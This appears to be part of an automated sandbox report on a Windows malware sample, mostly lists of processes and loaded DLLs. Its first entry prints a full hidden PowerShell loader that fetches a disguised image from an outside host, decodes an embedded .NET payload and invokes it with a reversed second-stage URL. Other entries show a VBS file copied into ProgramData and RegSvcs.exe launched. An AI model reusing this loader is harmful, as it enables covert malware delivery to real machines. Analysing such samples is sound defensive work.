Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'moquenqueiro','RegSvcs',''))} }"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1836,i,15139392700974412451,17984429462301809972,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\moquenqueiro.vbs"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: adsnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: virtdisk.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fltlib.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: virtdisk.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fltlib.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

